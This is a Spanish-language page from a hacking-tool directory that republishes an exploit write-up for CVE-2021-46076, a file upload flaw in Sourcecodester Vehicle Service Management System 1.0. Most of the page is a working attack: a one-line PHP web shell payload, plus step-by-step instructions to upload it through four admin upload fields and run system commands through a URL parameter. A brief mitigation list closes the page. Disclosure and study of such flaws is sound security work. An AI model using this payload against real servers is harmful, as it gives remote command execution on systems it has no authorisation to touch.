Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la carga de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que lleva a la ejecución de código. | Kitploit
Herramientas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la carga de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que lleva a la ejecución de código.

Ver Repositorio
hace 3 mesesAún no revisado

CVE-2021-46076

Título del Exploit: Vehicle Service Management System - La subida de múltiples archivos conduce a la ejecución de código

Autor del Exploit: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 ALTA

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Descripción:

Sourcecodester Vehicle Service Management System 1.0 es vulnerable a la subida de archivos. Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que conduce a la ejecución de código.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección My Account, ingrese todos los detalles requeridos y seleccione el archivo php en Avatar.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen del avatar en una nueva pestaña.
  5. Agregue el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección User List y haga clic en el botón Create New.

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la página Create New User, ingrese todos los detalles requeridos y seleccione el archivo php en Avatar.
  3. Haga clic en el botón Save.
  4. Abra la imagen del avatar en una nueva pestaña.
  5. Agregue el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección Settings, ingrese todos los detalles requeridos y seleccione el archivo php en System Logo.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen del System Logo en una nueva pestaña.
  5. Agregue el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Guarde el código php anterior, por ejemplo: Cmd.php
  2. En la sección Settings, ingrese todos los detalles requeridos y seleccione el archivo php en Website Cover.
  3. Haga clic en el botón de actualizar.
  4. Abra la imagen del Website Cover en una nueva pestaña.
  5. Agregue el parámetro cmd en la URL y ejecute los comandos.
  6. URL final: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Ejecute todos los comandos del sistema, por ejemplo: id, whoami, pwd, etc.

Impacto:

Un atacante puede subir un archivo php malicioso en múltiples endpoints, lo que conduce a la ejecución de código.

Mitigación:

Se recomienda implementar lo siguiente:

  • Nunca acepte un nombre de archivo y su extensión directamente sin tener un filtro de lista blanca.
  • Si no es necesario tener caracteres Unicode, se recomienda encarecidamente aceptar solo caracteres alfanuméricos y solo un punto como entrada para el nombre del archivo y la extensión.
  • Limite el tamaño del archivo a un valor máximo para prevenir ataques de denegación de servicio.
  • El directorio de subida no debe tener ningún permiso de 'ejecución'.
  • No confíe únicamente en la validación del lado del cliente.
Descargar herramienta